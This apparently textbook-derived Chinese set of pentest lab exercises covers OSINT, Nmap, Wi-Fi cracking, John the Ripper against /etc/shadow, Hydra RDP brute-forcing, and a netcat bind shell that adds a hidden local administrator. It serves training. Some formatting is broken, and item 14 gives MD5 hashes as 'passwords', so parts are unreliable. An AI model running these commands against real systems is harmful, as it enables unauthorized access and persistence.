网络安全工具与信息收集操作指南

1、使用 www.arin.net/whois 来发现组织的信息。步骤如下:1. 访问 www.arin.net/whois。2. 在 ARIN Whois/RDAP 搜索栏中输入 Microsoft,在 Whois 数据库中搜索微软。3. 浏览实体搜索结果。4. 选择句柄“MICRO – 218”的链接。5. 浏览结果。6. 对自己所在的组织进行同样类型的 Whois 搜索,以确定公司可能拥有的公共 IP 块。如果没有找到任何结果,尝试其他 Whois 数据库搜索网站。请描述该操作流程。

该流程指导通过特定步骤使用 www.arin.net/whois 查找微软信息,进而对自身组织进行同样的 Whois 搜索以确定公共 IP 块。若无果,可尝试其他 Whois 数据库搜索网站。

具体步骤为:

先访问该网站。 搜索“微软”。 浏览结果并选择特定句柄链接。 再浏览新结果。 对自身组织进行相同操作。

2、使用 theHarvester 收集你所在组织的电子邮件地址和主机 IP 地址。步骤:1. 在你的 Kali Linux 系统中启动终端会话。2. 使用以下命令,用 theHarvester 收集 wiley.com 公共系统的电子邮件地址和 IP 地址:theharvester -d wiley.com -b all。3. 现在使用 theHarvester 收集你所在组织的电子邮件地址和 IP 地址。


首先在 Kali Linux 系统中启动终端会话,接着执行命令:

```bash
theharvester -d wiley.com -b all

收集
wiley.com
公共系统的电子邮件地址和 IP 地址。之后,把命令中的
wiley.com
替换为你所在组织的域名,再次执行类似命令来收集你所在组织的电子邮件地址和 IP 地址。



##3、使用shodan.io为你的组织发现互联网上的系统以及有关这些系统的信息,请简述操作步骤。
### 使用Shodan发现组织互联网系统及相关信息的操作流程

1. **访问网站并注册登录**  
   打开Shodan网站,进行注册并登录账户。

2. **搜索公司**  
   在搜索框中输入公司名称或相关关键词,查找目标组织的互联网系统。

3. **浏览结果**  
   查看搜索结果页面,识别与目标组织相关的系统信息。

4. **查看系统物理位置**  
   在结果中选择具体的系统条目,查看其地理位置信息。

5. **选择系统查看详情**  
   点击感兴趣的系统,进入详情页面,获取更全面的信息,如开放端口、服务类型等。

6. **返回主结果**  
   完成详细查看后,返回主搜索结果页面以进行进一步分析或操作。

##4、在Kali Linux上使用recon - ng进行开源情报(OSINT)信息收集。步骤如下:1. 启动recon - ng并添加工作区。2. 在recon - ng中,为想要收集信息的公司配置域名和公司名称。3. 检索Whois联系人信息。4. 从Bing和Google检索相关域名和主机列表。5. 生成一个HTML报告来查看收集到的数据。
以下是具体操作步骤:

1. 启动recon-ng并添加工作区:
   ```
   recon - ng
   workspaces add wiley
   ```

2. 添加域名和公司名称到recon-ng数据库表:
   ```
   add domains wiley.com
   add domains www.wiley.com
   add domains dummies.com
   add domains www.dummies.com
   add companies Wiley~A publishing company
   add companies Wiley Publishing~A publishing company
   add companies ForDummies~A Wiley product line
   ```

3. 检索Whois联系人信息:
   ```
   use recon/domains-contacts/whois_pocs
   run
   ```

4. 从Bing和Google检索相关域名和主机列表:
   ```
   use recon/domains-hosts/bing_domain_web
   run
   use recon/domains-hosts/google_site_web
   run
   ```

5. 生成HTML报告:
   ```
   use reporting/html
   set CREATOR 'Glen E. Clarke'
   set CUSTOMER 'Wiley Publishing'
   set FILENAME /root/Desktop/Wiley_recon.html
   run
   ```

最后,你可以通过双击桌面上的HTML文件查看报告。

##5、使用dig工具对所在组织进行DNS分析,请写出具体步骤。
按照以下步骤使用 `dig` 进行组织的 DNS 分析:

1. 打开 Kali Linux 系统的终端;
2. 运行 `dig www.domain_name.com +short` 确定系统 IP 地址;
3. 运行 `dig domain_name.com NS +short` 确定公司 DNS 服务器;
4. 运行 `dig domain_name.com MX +short` 确定公司电子邮件服务器。

##6、使用 Nmap 对网络进行端口扫描,具体步骤如下:1. 在 Kali Linux 系统上,启动一个新的终端。2. 对网络进行 SYN 扫描。3. 通过版本扫描识别端口上运行的软件版本。4. 对特定系统进行 SYN 扫描,并识别该系统上运行的操作系统。
以下是具体操作步骤:

1. 打开 Kali Linux 系统,启动一个新的终端。
2. 进行 SYN 扫描一般使用 `nmap -sS 网络地址` 的命令来对网络进行 SYN 扫描。
3. 进行版本扫描以识别端口上运行的软件版本,使用 `-sV` 开关,命令如 `nmap -sV 网络地址`。
4. 对特定系统进行 SYN 扫描并识别其操作系统,使用 `-O` 开关,命令如 `nmap -sS -O 特定系统 IP 地址`。

注意要在实验室环境中运行这些命令,因为在生产网络上运行可能会触发入侵检测系统。

##7、若存在MS17 - 010关键漏洞,可以使用什么工具来利用此漏洞?请在此处填写该工具:_____________________________
Metasploit

##8、练习4 - 3:输入ifconfig命令分别记录Metasploitable2和Kali Linux的IP地址
需分别记录 `Metasploitable2` 和 `Kali Linux` 的 IP 地址,即:

1. 先记录 `Metasploitable2` 的 IP 地址  
2. 再记录 `Kali Linux` 的 IP 地址

##9、练习6 - 1:破解WEP加密。要进行此练习,你需要一个测试实验室环境,其中包含一个设置了WEP加密的接入点、一个连接到该接入点的无线客户端,以及一个配备支持的无线网卡的Kali Linux系统。1. 将路由器配置为WEP加密,并将客户端连接到无线网络,以验证客户端可以上网。2. 使用Kali Linux系统,按照操作指南中的步骤,查看是否可以破解WEP密钥。
此练习的操作步骤为:

1. 首先准备好测试实验室环境,包括设置了WEP加密的接入点、连接到该接入点的无线客户端以及配备支持的无线网卡的Kali Linux系统。
2. 接着将路由器配置为WEP加密,连接客户端到无线网络并验证其能上网。
3. 最后使用Kali Linux系统,按操作指南步骤尝试破解WEP密钥。

##10、练习6 - 2:破解WPS PIN。在本练习中,你需要搭建一个实验环境,其中包括一个配置为WPA加密且支持WPS的无线路由器、一个无线客户端,以及安装有支持的无线网卡的Kali Linux系统。步骤如下:1. 将路由器配置为WPA,并将客户端连接到无线网络,以验证客户端可以上网。2. 使用Kali Linux系统,按照“破解WPS实现漏洞”的操作步骤进行操作,看是否能破解WPS PIN。
该练习要求搭建特定实验环境,先将路由器配置为WPA并让客户端联网验证,再用Kali Linux系统按“破解WPS实现漏洞”步骤尝试破解WPS PIN。

##11、练习6 - 3:破解WPA/WPA2加密密钥。在这个练习中,你需要搭建一个实验室环境,其中包括一个配置为WPA2的无线路由器、一个无线客户端,以及一台装有支持的无线网卡的Kali Linux系统的设备。步骤如下:1. 将路由器配置为WPA2,并将客户端连接到无线网络,验证客户端可以正常上网。2. 使用Kali Linux系统,按照“破解WPA/WAP2加密密钥”的操作步骤,尝试破解WPA2加密密钥。
在该练习里,需搭建含配置 WPA2 的无线路由器、无线客户端和带支持网卡的 Kali Linux 系统的实验室环境。  

1. 先把路由器设为 WPA2,连接客户端上网验证;  
2. 再用 Kali Linux 系统按“破解 WPA/WPA2 加密密钥”步骤尝试破解密钥。

##12、练习6 - 4:测试蓝牙设备。你需要在一个配备支持蓝牙的智能手机的实验室环境中,使用一台带有支持蓝牙的网卡的Kali Linux系统。请按照相关步骤,查看是否能够发现蓝牙设备并从该设备中检索数据。
### 蓝牙设备发现与数据检索练习

要完成此练习,需在有蓝牙智能手机的实验室环境中,使用带有支持蓝牙网卡的Kali Linux系统,按相关步骤操作,以发现蓝牙设备并检索数据。

#### 操作准备
- 确保Kali Linux系统配备有支持蓝牙的适配器。
- 验证蓝牙适配器状态,可通过运行以下命令实现:
  ```
  hciconfig
  ```
- 如果蓝牙接口未启用,可使用以下命令启用(假设接口ID为 `hci0`):
  ```
  hciconfig hci0 up
  ```

#### 辅助工具
- 可使用如下工具辅助评估蓝牙设备:
  - **Bluelog**
  - **Blueranger**

##13、输入 ifconfig 命令查看 Kali Linux 的 IP 地址,并将其记录在此处:Kali Linux IP 地址:__________________
需在 Kali Linux 系统中运行 ifconfig 命令后获取实际 IP 地址填写

##14、在此记录每个账户的密码:管理员:___________________ 戈登·B:___________________ 1337:___________________ 巴勃罗:___________________ 史密斯:___________________
```markdown
管理员: 5f4dcc3b5aa765d61d8327deb882cf99  
戈登·B: e99a18c428cb38d5f260853678922e03  
1337: 8d3533d75ae2c3966d7e0d4fcc69216b  
巴勃罗: 0d107d09f5bbe40cade3de5c71e9e9b7  
史密斯: 5f4dcc3b5aa765d61d8327deb882cf99  

15、在Kali Linux系统上使用John the Ripper破解Linux用户账户的密码哈希,给出操作步骤。

在Kali Linux系统上打开终端。 使用以下命令创建几个用户账户:

bash useradd labUser useradd labUser2
使用以下命令为用户账户设置密码:
– 为
labUser
设置密码:

bash passwd labUser

输入密码
house
并确认。
– 为
labUser2
设置密码:

bash passwd labUser2

输入密码
kids
并确认。 通过键入以下命令查看Linux系统上的密码哈希:

bash cat /etc/shadow

查找带有密码哈希的新用户账户。 要破解密码哈希,键入以下命令:

bash john /etc/shadow

16、使用Nmap在网络上定位可以扫描漏洞的Web服务器,操作步骤是什么?

操作步骤:利用Nmap定位可扫描漏洞的Web服务器

该操作步骤可有效利用 Nmap 在网络中定位可扫描漏洞的 Web 服务器。

步骤说明

打开终端
在 Kali Linux 系统中打开终端。

执行扫描命令
使用示例命令进行扫描(可根据实际网络修改 IP 范围)。

记录结果
最后记录端口 80 开放的系统 IP 地址。

结果说明

这些记录的 IP 地址对应的系统即为定位到的 Web 服务器。

17、使用Nikto扫描Web服务器的安全漏洞,操作步骤如下:1. 使用Kali Linux系统,启动终端会话。2. 使用Nikto对每个Web服务器执行Web应用程序漏洞扫描:nikto -h 192.168.2.2。3. 查看结果。判断该操作步骤是否可行,并说明理由。

该操作步骤可行。Nikto 是 Kali Linux 自带的命令行工具,可用于评估渗透测试范围内不同网站的安全性。

使用以下命令可对 IP 为
192.168.2.2
的 Web 服务器进行漏洞扫描:


nikto -h 192.168.2.2

扫描完成后查看结果即可了解该服务器的安全状况。

18、使用Hydra对目标Windows机器进行密码破解,在Windows系统上,确保启用远程桌面。请列出操作步骤。

在Windows系统上,启用远程桌面。

在Windows系统上,创建一个名为
lab9user
的新用户账户,密码为
house

在Kali Linux系统上,创建一个名为
passlist.txt
的文本文件,包含以下密码列表:

password


testpass


toor


pa$$word


house


kids

并将其保存到根文件夹。

在Kali Linux的终端中,键入以下命令,尝试使用RDP破解密码:

bash hydra -t 4 -l lab9user -P passlist.txt -V rdp://ip_of_windows

滚动查看结果。

19、使用CeWL爬取网站并从网站内容创建单词列表文件的操作步骤是什么

在Kali Linux系统上打开终端。 使用命令
cewl -d 3 -m 5 -w crawledwords.txt http://ip_of_site
爬取网站并从其内容构建单词列表。 使用命令
cat crawledwords.txt
显示单词列表文件的内容。

20、使用Netcat(nc和Ncat)在目标系统上创建一个绑定shell,以便随时远程访问的操作步骤。

在目标Windows系统上,下载最新的Windows版本的Nmap,因为它现在包含
ncat.exe
。 下载完成后,进入命令提示符并键入以下命令:


Cd Cd program files(x86)
map

运行
dir
命令,应看到
ncat.exe
程序。 要将Windows系统设置为在端口5555上监听并发送shell,请运行以下命令:


ncat -n -v -l -p 5555 -e cmd.exe

此时Windows机器处于监听模式,切换到Kali Linux系统并启动终端。

在终端中键入以下内容,以连接到Windows目标的端口5555并获得命令shell:


nc -n -v ip_of_windows 5555

连接到Windows系统后,可运行Windows命令。

运行以下命令:

(1) 显示登录的用户:


whoami

(2) 创建名为
shelluser
的用户:


net user shelluser Pa$$w0rd /add

(3) 将该用户添加到本地管理员组(假设以管理员账户登录):


net localgroup administrators shelluser /add

(4) 显示用户列表以验证新用户是否已创建:


net user

21、查看以下代码并回答后续问题。代码为:computers=(‘computer1’ ‘computer2’); for comp in “${computers[@]}”; do echo ‘==========================================’; echo “Scanning $comp”; echo ‘==========================================’; for port in {80,3389}; do echo ‘’ > /dev/tcp/$host/$port && echo “Port $port is open”; done 2>/dev/null; done。该脚本使用了什么语言编写?

Bash脚本语言

22、回顾以下代码并回答后续问题。代码为数组包含’computer1’和’computer2’,通过循环遍历数组中的每台计算机,对每台计算机扫描80和3389端口,若端口开放则输出相应信息。请问该脚本的作用是什么?

该脚本会依次扫描
computer1

computer2
这两台计算机的 80 和 3389 端口,若端口开放则输出相应提示信息。

23、在 Linux 系统上,将脚本输入到文本文件中,然后执行该脚本。确保将脚本中计算机名称更改为实验室环境中使用的计算机名称。

操作说明

先在文本文件中输入脚本内容。 将脚本中的计算机名称替换为实验室环境中实际使用的名称。 执行脚本前,确保文件具有执行权限:
– 可使用以下命令赋予权限:

chmod 755 文件名.sh
使用以下命令执行脚本:

./文件名.sh

24、审查以下代码,判断这段脚本使用了什么语言编写。代码如下:# 此部分导入要使用的代码库 import socket import subprocess import sys from datetime import datetime # 这行代码清空屏幕 subprocess.call(‘clear’, shell=True) remoteSystem = raw_input(“Enter a FQDN to scan: “) remoteSystemIP = socket.gethostbyname(remoteSystem) print “—————————————————” print “Please wait, scanning IP address:”, remoteSystemIP print “—————————————————” startTime = datetime.now() try: for port in range(1,1024): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((remoteSystemIP, port)) if result == 0: print “Port {}: Open”.format(port) sock.close() except socket.error: print “Failure connecting to system” sys.exit() endTime = datetime.now() difftime = endTime – startTime print ‘Time to complete operation: ‘, difftime

Python

25、查看一段代码,代码中有使用 # 开头部分进行代码库导入操作,导入了 socket、subprocess、sys 以及从 datetime 导入了 datetime。接着有清除屏幕的操作,通过 raw_input 获取用户输入的 FQDN 并获取其 IP 地址,打印相关提示信息,记录开始时间,尝试对 1 到 1023 端口进行扫描,若端口开放则打印信息,若出现 socket 错误则输出连接失败信息并退出程序,最后记录结束时间并计算操作耗时。问如何判断这段代码使用的是什么语言?

代码中使用了
import
语句导入模块,
raw_input
函数获取用户输入,
print
语句输出信息,以及
for
循环和
try-except
异常处理结构,这些都是 Python 语言的典型特征,所以可以判断使用的语言是 Python。

26、审查以下代码并回答后续问题。代码功能是先导入所需库,清屏,提示用户输入要扫描的完全限定域名(FQDN)并获取其 IP 地址,然后从 1 到 1023 端口进行扫描,若端口开放则输出信息,记录扫描开始和结束时间并计算耗时。该脚本的作用是什么?

该脚本用于扫描用户输入的完全限定域名(FQDN)对应的 IP 地址的 1 到 1023 端口,找出开放的端口,并记录扫描操作的耗时。

27、在安装了 Python 的系统上,将脚本输入到文本文件中,然后执行该脚本,具体该怎么做?

以下是具体步骤:

使用文本编辑器编写 Python 脚本,如
print('Hello, World!')
。 将编写好的脚本保存为
.py
扩展名的文件,如
test.py
。 打开终端或命令提示符,进入保存脚本文件的目录。 执行命令
python test.py
来运行脚本(若为 Python 3,可能需要使用
python3 test.py
)。

28、审查以下代码并回答后续问题。代码为:$creds = get – credential – Message “Enter username and password of an admin account.” $comp = read – host “Enter computername” write – host “User accounts on: $comp” – ForegroundColor Cyan Get – WmiObject win32_userAccount – ComputerName $comp | format – table name, @{n=’Computername’;e={$_.domain}},caption write – host “Operating System Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_operatingsystem – ComputerName $comp | format – list CSName,Caption,OSArchitecture,ServicePackMajorVersion write – host “Computer Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_computersystem – ComputerName $comp | format – list Caption,Domain,Manufacturer,SystemFamily。该脚本使用什么语言编写?

PowerShell

29、查看以下代码,判断使用的是什么语言。代码如下:$creds = get – credential – Message “Enter username and password of an admin account.” $comp = read – host “Enter computername” write – host “User accounts on: $comp” – ForegroundColor Cyan Get – WmiObject win32_userAccount – ComputerName $comp | format – table name, @{n=’Computername’;e={$_.domain}},caption write – host “Operating System Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_operatingsystem – ComputerName $comp | format – list CSName,Caption,OSArchitecture,ServicePackMajorVersion write – host “Computer Info on: $comp” – ForegroundColor Cyan Get – WMIObject win32_computersystem – ComputerName $comp | format – list Caption,Domain,Manufacturer,SystemFamily。

代码中使用了 PowerShell 特有的命令和语法,如
get-credential

read-host

write-host

Get-WmiObject
等,还有变量以
$
开头,管道符
|
的使用方式也符合 PowerShell 的特点,因此可判断使用的是 PowerShell 语言。

© 版权声明

相关文章

暂无评论

none
暂无评论...